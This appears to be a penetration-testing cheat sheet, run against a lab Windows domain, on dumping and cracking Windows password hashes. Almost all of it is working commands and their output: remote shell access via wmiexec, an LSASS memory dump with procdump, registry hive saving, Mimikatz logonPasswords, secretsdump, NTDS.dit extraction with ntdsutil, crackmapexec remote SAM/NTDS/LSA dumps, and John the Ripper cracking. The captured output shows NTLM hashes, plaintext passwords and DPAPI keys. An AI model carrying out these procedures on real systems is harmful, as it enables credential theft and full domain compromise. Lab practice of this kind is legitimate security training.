=================================================================================================================================================
Example 1. Dumping local Windows password hashes
   => Targets: registry hives (SAM, SYSTEM, SECURITY), LSA secrets
   => Tools: WMIexec + REG SAVE + Secretsdump + ProcDump + Mimikatz 
=================================================================================================================================================

=> A valid local or domain Windows account member of the 'local administrator' group is required for dumping "local" passwords
 
jeff@kali:~/Documents/Tools/Sysinternals$ wmiexec.py Qualys@192.168.1.50
Impacket v0.9.21.dev1 - Copyright 2020 SecureAuth Corporation
Password:
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

C:\>cd temp

C:\temp>put procdump64.exe
[*] Uploading procdump64.exe to C:\temp\procdump64.exe

C:\temp>procdump64.exe -accepteula -ma lsass.exe lsassdump.dmp

ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[22:56:50] Dump 1 initiated: C:\temp\lsassdump.dmp
[22:56:50] Dump 1 writing: Estimated dump file size is 100 MB.
[22:56:50] Dump 1 complete: 100 MB written in 0.1 seconds
[22:56:50] Dump count reached.

C:\temp>get lsassdump.dmp
[*] Downloading C:\\temp\lsassdump.dmp

C:\temp>reg SAVE HKLM\SAM C:\temp\sam.hive
The operation completed successfully.

C:\temp>reg SAVE HKLM\SYSTEM C:\temp\system.hive
The operation completed successfully.

C:\temp> reg SAVE HKLM\SECURITY C:\temp\security.hive
The operation completed successfully.

C:\temp>dir
 Volume in drive C has no label.
 Volume Serial Number is C022-C9A0
 Directory of C:\temp

04/17/2020  10:58 PM    <DIR>          .
04/17/2020  10:58 PM    <DIR>          ..
04/17/2020  10:56 PM       102,002,590 lsassdump.dmp
04/17/2020  10:56 PM           341,672 procdump64.exe
04/17/2020  10:57 PM            36,864 sam.hive
04/17/2020  10:58 PM            32,768 security.hive
04/17/2020  10:58 PM        10,534,912 system.hive
               5 File(s)    112,948,806 bytes
               2 Dir(s)  24,606,978,048 bytes free

C:\temp>get sam.hive
[*] Downloading C:\\temp\sam.hive

C:\temp>get security.hive
[*] Downloading C:\\temp\security.hive

C:\temp>get system.hive
[*] Downloading C:\\temp\system.hive

C:\temp>

-----------------------------------

PS C:\temp> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Mar  8 2020 18:30:37
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # 

mimikatz # sekurlsa::minidump lsassdump.dmp
Switch to MINIDUMP : 'lsassdump.dmp'

mimikatz # sekurlsa::logonPasswords
Opening : 'lsassdump.dmp' file for minidump...

Authentication Id : 0 ; 42220 (00000000:0000a4ec)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 4/17/2020 10:03:31 PM
SID               : S-1-5-90-1
        msv :
         [00000003] Primary
         * Username : TEMP-DC$
         * Domain   : SECURITY-LAB
         * NTLM     : 540ddc43f8c664881760a1259f3fb021
         * SHA1     : 72676e5222832ae8e6810d57b227e1efd7d9598e
        tspkg :
        wdigest :
         * Username : TEMP-DC$
         * Domain   : SECURITY-LAB
         * Password : (null)
        kerberos :
         * Username : TEMP-DC$
         * Domain   : Security-Test-Lab.Local
         * Password : 5e a4 36 2d 93 95 d8 58 87 7c 59 dd f0 cc 0d 2a e4 96 1b 4f c3 75 5e 6c f6 56 a0 f4 1c d9 f2 8b be
 7b 66 32 9f af c9 db b4 96 29 52 cb fc 1e 2d 53 dd f9 1f b6 34 63 af 3b 18 b8 b7 3e c0 bb 3f 43 0c f7 00 4b 70 4f 4a 4f
 4c 67 4e e6 fd ed c4 26 b0 e8 18 3f 15 b0 48 fe fe c8 05 47 d1 fc 32 40 07 09 2c 7b cd 52 71 da 58 f9 c9 f0 b6 62 3f f4
 38 d6 c6 f2 bf f0 a1 19 3e d6 c1 28 15 3e 58 04 f1 32 d8 34 7b 1a a8 5f 83 06 88 5d b7 7a dc f0 14 5c bb 64 1f ba c9 3e
 c3 25 eb a8 23 f0 0c 1c d1 97 78 5d 96 fa b5 f4 d1 c1 5c bc d7 4a a4 5c 2e d9 b5 2e 22 46 76 fc 0d 9d 8d 5d 3b 50 19 fb
 20 06 18 83 92 68 0b e6 d6 74 ad 20 39 69 a4 65 02 bc dc 9a a9 40 c5 21 4c f4 3f e3 ea 02 aa 53 ad d7 98 b9 d7 47 87 1d
 d2 69 fe 33 41 59 c1
        ssp :   KO
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : TEMP-DC$
Domain            : SECURITY-LAB
Logon Server      : (null)
Logon Time        : 4/17/2020 10:03:31 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : TEMP-DC$
         * Domain   : SECURITY-LAB
         * NTLM     : 540ddc43f8c664881760a1259f3fb021
         * SHA1     : 72676e5222832ae8e6810d57b227e1efd7d9598e
        tspkg :
        wdigest :
         * Username : TEMP-DC$
         * Domain   : SECURITY-LAB
         * Password : (null)
        kerberos :
         * Username : temp-dc$
         * Domain   : Security-Test-Lab.Local
         * Password : 5e a4 36 2d 93 95 d8 58 87 7c 59 dd f0 cc 0d 2a e4 96 1b 4f c3 75 5e 6c f6 56 a0 f4 1c d9 f2 8b be
 7b 66 32 9f af c9 db b4 96 29 52 cb fc 1e 2d 53 dd f9 1f b6 34 63 af 3b 18 b8 b7 3e c0 bb 3f 43 0c f7 00 4b 70 4f 4a 4f
 4c 67 4e e6 fd ed c4 26 b0 e8 18 3f 15 b0 48 fe fe c8 05 47 d1 fc 32 40 07 09 2c 7b cd 52 71 da 58 f9 c9 f0 b6 62 3f f4
 38 d6 c6 f2 bf f0 a1 19 3e d6 c1 28 15 3e 58 04 f1 32 d8 34 7b 1a a8 5f 83 06 88 5d b7 7a dc f0 14 5c bb 64 1f ba c9 3e
 c3 25 eb a8 23 f0 0c 1c d1 97 78 5d 96 fa b5 f4 d1 c1 5c bc d7 4a a4 5c 2e d9 b5 2e 22 46 76 fc 0d 9d 8d 5d 3b 50 19 fb
 20 06 18 83 92 68 0b e6 d6 74 ad 20 39 69 a4 65 02 bc dc 9a a9 40 c5 21 4c f4 3f e3 ea 02 aa 53 ad d7 98 b9 d7 47 87 1d
 d2 69 fe 33 41 59 c1
        ssp :   KO
        credman :

Authentication Id : 0 ; 183453 (00000000:0002cc9d)
Session           : Interactive from 1
User Name         : Administrator
Domain            : SECURITY-LAB
Logon Server      : TEMP-DC
Logon Time        : 4/17/2020 10:31:41 PM
SID               : S-1-5-21-3698357007-189532211-3203426890-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SECURITY-LAB
         * NTLM     : a134f40245c97f246e054cd56207eb28
         * SHA1     : 0e8ab5d5470221cc25a1198ed56fdf7720c7ef4a
         [00010000] CredentialKeys
         * NTLM     : a134f40245c97f246e054cd56207eb28
         * SHA1     : 0e8ab5d5470221cc25a1198ed56fdf7720c7ef4a
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : SECURITY-LAB
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SECURITY-TEST-LAB.LOCAL
         * Password : (null)
        ssp :   KO
        credman :
         [00000000]
         * Username : SECURITY-LAB\backup
         * Domain   : SECURITY-LAB\backup
         * Password : Test1234

Authentication Id : 0 ; 71287 (00000000:00011677)
Session           : Batch from 0
User Name         : backup
Domain            : SECURITY-LAB
Logon Server      : TEMP-DC
Logon Time        : 4/17/2020 10:03:47 PM
SID               : S-1-5-21-3698357007-189532211-3203426890-1008
        msv :
         [00010000] CredentialKeys
         * NTLM     : b9e0cfceaf6d077970306a2fd88a7c0a
         * SHA1     : d7a6378b84d08cb2bc3240c89f81d184f6d69b15
         [00000003] Primary
         * Username : backup
         * Domain   : SECURITY-LAB
         * NTLM     : b9e0cfceaf6d077970306a2fd88a7c0a
         * SHA1     : d7a6378b84d08cb2bc3240c89f81d184f6d69b15
        tspkg :
        wdigest :
         * Username : backup
         * Domain   : SECURITY-LAB
         * Password : (null)
        kerberos :
         * Username : backup
         * Domain   : Security-Test-Lab.Local
         * Password : Test1234
        ssp :   KO
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 4/17/2020 10:03:31 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :   KO
        credman :

Authentication Id : 0 ; 42279 (00000000:0000a527)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 4/17/2020 10:03:31 PM
SID               : S-1-5-90-1
        msv :
         [00000003] Primary
         * Username : TEMP-DC$
         * Domain   : SECURITY-LAB
         * NTLM     : 540ddc43f8c664881760a1259f3fb021
         * SHA1     : 72676e5222832ae8e6810d57b227e1efd7d9598e
        tspkg :
        wdigest :
         * Username : TEMP-DC$
         * Domain   : SECURITY-LAB
         * Password : (null)
        kerberos :
         * Username : TEMP-DC$
         * Domain   : Security-Test-Lab.Local
         * Password : 5e a4 36 2d 93 95 d8 58 87 7c 59 dd f0 cc 0d 2a e4 96 1b 4f c3 75 5e 6c f6 56 a0 f4 1c d9 f2 8b be
 7b 66 32 9f af c9 db b4 96 29 52 cb fc 1e 2d 53 dd f9 1f b6 34 63 af 3b 18 b8 b7 3e c0 bb 3f 43 0c f7 00 4b 70 4f 4a 4f
 4c 67 4e e6 fd ed c4 26 b0 e8 18 3f 15 b0 48 fe fe c8 05 47 d1 fc 32 40 07 09 2c 7b cd 52 71 da 58 f9 c9 f0 b6 62 3f f4
 38 d6 c6 f2 bf f0 a1 19 3e d6 c1 28 15 3e 58 04 f1 32 d8 34 7b 1a a8 5f 83 06 88 5d b7 7a dc f0 14 5c bb 64 1f ba c9 3e
 c3 25 eb a8 23 f0 0c 1c d1 97 78 5d 96 fa b5 f4 d1 c1 5c bc d7 4a a4 5c 2e d9 b5 2e 22 46 76 fc 0d 9d 8d 5d 3b 50 19 fb
 20 06 18 83 92 68 0b e6 d6 74 ad 20 39 69 a4 65 02 bc dc 9a a9 40 c5 21 4c f4 3f e3 ea 02 aa 53 ad d7 98 b9 d7 47 87 1d
 d2 69 fe 33 41 59 c1
        ssp :   KO
        credman :

Authentication Id : 0 ; 22819 (00000000:00005923)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 4/17/2020 10:03:30 PM
SID               :
        msv :
         [00000003] Primary
         * Username : TEMP-DC$
         * Domain   : SECURITY-LAB
         * NTLM     : 540ddc43f8c664881760a1259f3fb021
         * SHA1     : 72676e5222832ae8e6810d57b227e1efd7d9598e
        tspkg :
        wdigest :
        kerberos :
        ssp :   KO
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : TEMP-DC$
Domain            : SECURITY-LAB
Logon Server      : (null)
Logon Time        : 4/17/2020 10:03:30 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : TEMP-DC$
         * Domain   : SECURITY-LAB
         * Password : (null)
        kerberos :
         * Username : temp-dc$
         * Domain   : SECURITY-TEST-LAB.LOCAL
         * Password : (null)
        ssp :   KO
        credman :

mimikatz #

-----------------------------------

jeff@kali:~/Documents/CTFs/BadBlood$ secretsdump.py -sam ./sam.hive -security ./security.hive -system ./system.hive LOCAL

Impacket v0.9.21.dev1 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x941140bd825386b732031d5c5b01ae8a

[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1d6fcbd306077d663e23775e55b3f2e5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:5ea4362d9395d858877c59ddf0cc0d2ae4961b4fc3755e6cf656a0f41cd9f28bbe7b66329fafc9dbb4962952cbfc1e2d53ddf91fb63463af3b18b8b73ec0bb3f430cf7004b704f4a4f4c674ee6fdedc426b0e8183f15b048fefec80547d1fc324007092c7bcd5271da58f9c9f0b6623ff438d6c6f2bff0a1193ed6c128153e5804f132d8347b1aa85f8306885db77adcf0145cbb641fbac93ec325eba823f00c1cd197785d96fab5f4d1c15cbcd74aa45c2ed9b52e224676fc0d9d8d5d3b5019fb2006188392680be6d674ad203969a46502bcdc9aa940c5214cf43fe3ea02aa53add798b9d747871dd269fe334159c1
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:540ddc43f8c664881760a1259f3fb021

[*] DefaultPassword 
(Unknown User):ROOT#123

[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3bef35d8b9ddf267aac8ed41ce41c1a9d9d59382
dpapi_userkey:0x931d191734e96d32cab6f3a0950e0d30204b5377
[*] NL$KM 
 0000   08 26 6A A5 52 EB F1 C3  BF 0E 76 5C B4 C9 C8 1A   .&j.R.....v\....
 0010   E7 57 D5 64 4D 75 CD 0E  41 64 D3 00 B7 B7 F2 DA   .W.dMu..Ad......
 0020   77 1C 3B E0 F5 7E B1 FF  2C 9B 8D 8B 6A 8A 8D 0A   w.;..~..,...j...
 0030   E2 46 DA 0D CA E7 A7 AE  79 B1 35 19 7E D1 E7 F2   .F......y.5.~...
NL$KM:08266aa552ebf1c3bf0e765cb4c9c81ae757d5644d75cd0e4164d300b7b7f2da771c3be0f57eb1ff2c9b8d8b6a8a8d0ae246da0dcae7a7ae79b135197ed1e7f2
[*] Cleaning up... 


=================================================================================================================================================
Example 2. Dumping Windows domain password hashes
   => Targets: NDTDS.dit, registry hive "SYSTEM"
   => Tools: NTDSUTIL + Secretsdump
=================================================================================================================================================

=> A valid domain account member of the 'Domain admins' group or Domain Controller builit-in 'Administrators' group is required for dumping "domain" passwords.

2.1 Ntdsutil
-------------
The ntdsutil snapshot facility (introduced in Windows Server 2008) can create a snapshot of the active directory database.
It allows to copy the ntds.dit and SYSTEM files.

	C:\>ntdsutil
	activate instance ntds
	ifm
	create full c:\NTDS_saved
	quit
	quit
  
  
2.2 Secretsdump (impacket)
---------------------------
The impacket secretsdump module can be used to perform various tasks including extraction of contents of the NTDS file. 
It requires the registry hive "SYSTEM" and the NTDS.dit database file.

jeff@kali:~/Documents/CTFs/BadBlood$ secretsdump.py -ntds ./NTDS_saved -system ./system.hive LOCAL
  

=================================================================================================================================================
Example 3. Dump remotely local and domain password hashes
   => Targets: registry hives (SAM, SYSTEM, SECURITY), NDTDS.DIT, LSA secrets
   => Tools: CrackMapExec (it uses secretsdump)   
=================================================================================================================================================

3.1 Dump remotely local password hashes
----------------------------------------
jeff@kali:~$ crackmapexec smb 192.168.1.50 -u Administrator -p Test123456 --sam
SMB         192.168.1.50    445    TEMP-DC          [*] Windows Server 2012 R2 Standard 9600 x64 (name:TEMP-DC) (domain:SECURITY-LAB) (signing:True) (SMBv1:True)
SMB         192.168.1.50    445    TEMP-DC          [+] SECURITY-LAB\Administrator:Test123456 (Pwn3d!)
SMB         192.168.1.50    445    TEMP-DC          [+] Dumping SAM hashes
SMB         192.168.1.50    445    TEMP-DC          Administrator:500:aad3b435b51404eeaad3b435b51404ee:1d6fcbd306077d663e23775e55b3f2e5:::
SMB         192.168.1.50    445    TEMP-DC          Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.1.50    445    TEMP-DC          [+] Added 2 SAM hashes to the database


3.2 Dump remotely domain password hashes
------------------------------------------
There are 2 methods with secretsdump.py to remotely dump the domain password hashes (NTDS.DIT)
=> drsuapi - Uses drsuapi RPC interface create a handle, trigger replication, and combined with additional drsuapi calls to convert the resultant linked-lists into readable format  
=> vss 	   - Uses the Volume Shadow copy Service  

jeff@kali:~/Documents/CTFs/BadBlood$ crackmapexec smb 192.168.1.50 -u Administrator -p Test123456 --ntds vss > crackmap-NTDS-vss-dump.txt

jeff@kali:~/Documents/CTFs/BadBlood$ more crackmap-NTDS-vss-dump.txt
SMB         192.168.1.50    445    TEMP-DC          [*] Windows Server 2012 R2 Standard 9600 x64 (name:TEMP-DC) (domain:SECURITY-LAB) (signing:True) (SMBv1:True)
SMB         192.168.1.50    445    TEMP-DC          [+] SECURITY-LAB\Administrator:Test123456 (Pwn3d!)
SMB         192.168.1.50    445    TEMP-DC          [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.1.50    445    TEMP-DC          Administrator:500:aad3b435b51404eeaad3b435b51404ee:a134f40245c97f246e054cd56207eb28:::
SMB         192.168.1.50    445    TEMP-DC          Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.1.50    445    TEMP-DC          krbtgt:502:aad3b435b51404eeaad3b435b51404ee:208ae4a2c5aa7b40d047<SNIP>
SMB         192.168.1.50    445    TEMP-DC          backup:1008:aad3b435b51404eeaad3b435b51404ee:b9e0cfceaf6d077970306a2fd88a7c0a:::
SMB         192.168.1.50    445    TEMP-DC          Security-Test-Lab.Local\EDUARDO_MAXWELL:1112:aad3b435b51404eeaad3b435b51404ee:63897a6fb3ac955b0ec847786bfa9d23:::
SMB         192.168.1.50    445    TEMP-DC          Security-Test-Lab.Local\INES_TILLMAN:1113:aad3b435b51404eeaad3b435b51404ee:70d56a72e9cacdc6df36d990adb3b073:::
SMB         192.168.1.50    445    TEMP-DC          Security-Test-Lab.Local\BRIDGET_BALLARD:1114:aad3b435b51404eeaad3b435b51404ee:1d5651ad1e8f8ead2775cfded5c9934e:::
SMB         192.168.1.50    445    TEMP-DC          Security-Test-Lab.Local\RHONDA_EATON:1115:aad3b435b51404eeaad3b435b51404ee:4c64c4bfd6302278f5b989fc76a886b5:::
<SNIP>


3.3 Dump remotely LSA secrets
------------------------------
jeff@kali:~$ crackmapexec smb 192.168.1.50 -u Administrator -p Test123456 --lsa
SMB         192.168.1.50    445    TEMP-DC          [*] Windows Server 2012 R2 Standard 9600 x64 (name:TEMP-DC) (domain:SECURITY-LAB) (signing:True) (SMBv1:True)
SMB         192.168.1.50    445    TEMP-DC          [+] SECURITY-LAB\Administrator:Test123456 (Pwn3d!)
SMB         192.168.1.50    445    TEMP-DC          [+] Dumping LSA secrets
SMB         192.168.1.50    445    TEMP-DC          SECURITY-LAB\TEMP-DC$:aes256-cts-hmac-sha1-96:a51fe9e4a962fed040052e2b86930b9f1ba347b2ba8f5288c8bf00e11f3dd108
SMB         192.168.1.50    445    TEMP-DC          SECURITY-LAB\TEMP-DC$:aes128-cts-hmac-sha1-96:d7822113cadddb7725d5a22798115e69
SMB         192.168.1.50    445    TEMP-DC          SECURITY-LAB\TEMP-DC$:des-cbc-md5:e5bc859dfef1c1c1
SMB         192.168.1.50    445    TEMP-DC          SECURITY-LAB\TEMP-DC$:aad3b435b51404eeaad3b435b51404ee:2867a2a9eaed3d2e20011a0f3e4fd9cc:::
SMB         192.168.1.50    445    TEMP-DC          (Unknown User):ROOT#123
SMB         192.168.1.50    445    TEMP-DC          dpapi_machinekey:0x3bef35d8b9ddf267aac8ed41ce41c1a9d9d59382
                                                    dpapi_userkey:0x931d191734e96d32cab6f3a0950e0d30204b5377
SMB         192.168.1.50    445    TEMP-DC          NL$KM:08266aa552ebf1c3bf0e765cb4c9c81ae757d5644d75cd0e4164d300b7b7f2da771c3be0f57eb1ff2c9b8d8b6a8a8d0ae246da0dcae7a7ae79b135197ed1e7f2
SMB         192.168.1.50    445    TEMP-DC          [+] Dumped 7 LSA secrets to /home/jeff/.cme/logs/TEMP-DC_192.168.1.50_2020-04-14_191531.lsa and /home/jeff/.cme/logs/TEMP-DC_192.168.1.50_2020-04-14_191531.cached


=================================================================================================================================================
Windows password cracking using John (JTR)
=================================================================================================================================================

jeff@kali:~/Documents/CTFs/BadBlood$ sudo john NTDS-extract.txt --rules=all --wordlist=/usr/share/wordlists/rockyou.txt --format=nt
Using default input encoding: UTF-8
Loaded 4392 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:45 DONE (2020-04-15 18:31) 0g/s 5170Kp/s 5170Kc/s 22808MC/s Aadamfamaylming..Aaaaaaaaaaaaing
Session completed
